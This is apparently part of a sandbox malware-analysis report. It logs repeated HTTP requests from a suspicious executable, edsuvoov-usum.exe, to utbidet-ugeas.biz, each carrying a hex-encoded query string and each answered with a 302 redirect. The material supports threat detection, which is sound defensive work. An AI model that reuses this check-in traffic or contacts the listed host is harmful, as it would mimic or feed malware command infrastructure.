                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            54192.168.2.361395172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:55.835665941 CEST169OUTGET /d/N?0259BA88095EBA88096BBAA00959BA06DACD82205358BA48A15BB9BE276B94B13B698AA609 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.315468073 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:56 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0259BA88095EBA88096BBAA00959BA06DACD82205358BA48A15BB9BE276B94B13B698AA609
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            55192.168.2.361396172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.326698065 CEST201OUTGET /d/N?0259BA88095EBA88096BBAA00959BA06DACD82205358BA48A15BB9BE276B94B13B698AA609 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:56.866570950 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:56 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0259BA88095EBA88096BBAA00959BA06DACD82205358BA48A15BB9BE276B94B13B698AA609
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            56192.168.2.361398172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.022957087 CEST169OUTGET /d/N?02A8EA4905AFEA49059AEA6105A8EAC7D63CD2E15FA9EA89ADAAE97F2B9AC4703798DA6705 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.499131918 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:57 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02A8EA4905AFEA49059AEA6105A8EAC7D63CD2E15FA9EA89ADAAE97F2B9AC4703798DA6705
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            57192.168.2.361399172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.505104065 CEST201OUTGET /d/N?02A8EA4905AFEA49059AEA6105A8EAC7D63CD2E15FA9EA89ADAAE97F2B9AC4703798DA6705 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:57.993714094 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:57 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02A8EA4905AFEA49059AEA6105A8EAC7D63CD2E15FA9EA89ADAAE97F2B9AC4703798DA6705
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            58192.168.2.361401172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:58.741848946 CEST169OUTGET /d/N?0214874BFE13874BFE268763FE1487C52D80BFE3A415878B5616847DD026A972CC24B765FE HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.217154026 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:59 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0214874BFE13874BFE268763FE1487C52D80BFE3A415878B5616847DD026A972CC24B765FE
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            59192.168.2.361402172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.239088058 CEST201OUTGET /d/N?0214874BFE13874BFE268763FE1487C52D80BFE3A415878B5616847DD026A972CC24B765FE HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.721636057 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:59 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0214874BFE13874BFE268763FE1487C52D80BFE3A415878B5616847DD026A972CC24B765FE
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            60192.168.2.361404172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:59.913547993 CEST169OUTGET /d/N?02EB193971EC193971D9191171EB19B7A27F21912BEA19F9D9E91A0F5FD9370043DB291771 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.425765991 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:00 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02EB193971EC193971D9191171EB19B7A27F21912BEA19F9D9E91A0F5FD9370043DB291771
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            61192.168.2.361405172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.431756973 CEST201OUTGET /d/N?02EB193971EC193971D9191171EB19B7A27F21912BEA19F9D9E91A0F5FD9370043DB291771 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:00.943790913 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:00 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02EB193971EC193971D9191171EB19B7A27F21912BEA19F9D9E91A0F5FD9370043DB291771
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            62192.168.2.361407172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:01.657562971 CEST169OUTGET /d/N?025D7412245A7412246F743A245D749CF7C94CBA7E5C74D28C5F77240A6F5A2B166D443C24 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.253686905 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:02 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025D7412245A7412246F743A245D749CF7C94CBA7E5C74D28C5F77240A6F5A2B166D443C24
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            63192.168.2.361408172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.259665966 CEST201OUTGET /d/N?025D7412245A7412246F743A245D749CF7C94CBA7E5C74D28C5F77240A6F5A2B166D443C24 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:02.750132084 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:02 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?025D7412245A7412246F743A245D749CF7C94CBA7E5C74D28C5F77240A6F5A2B166D443C24
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            64192.168.2.361410172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.414925098 CEST169OUTGET /d/N?0216471A6811471A6824473268164794BB827FB2321747DAC014442C462469235A26773468 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.926264048 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:07 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0216471A6811471A6824473268164794BB827FB2321747DAC014442C462469235A26773468
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            65192.168.2.361411172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:07.936316013 CEST201OUTGET /d/N?0216471A6811471A6824473268164794BB827FB2321747DAC014442C462469235A26773468 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:08.437793016 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:08 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0216471A6811471A6824473268164794BB827FB2321747DAC014442C462469235A26773468
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            66192.168.2.361413172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.086427927 CEST169OUTGET /d/N?027931B6B47E31B6B44B319EB479313867ED091EEE7831761C7B32809A4B1F8F86490198B4 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:09.578429937 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:09 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?027931B6B47E31B6B44B319EB479313867ED091EEE7831761C7B32809A4B1F8F86490198B4
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
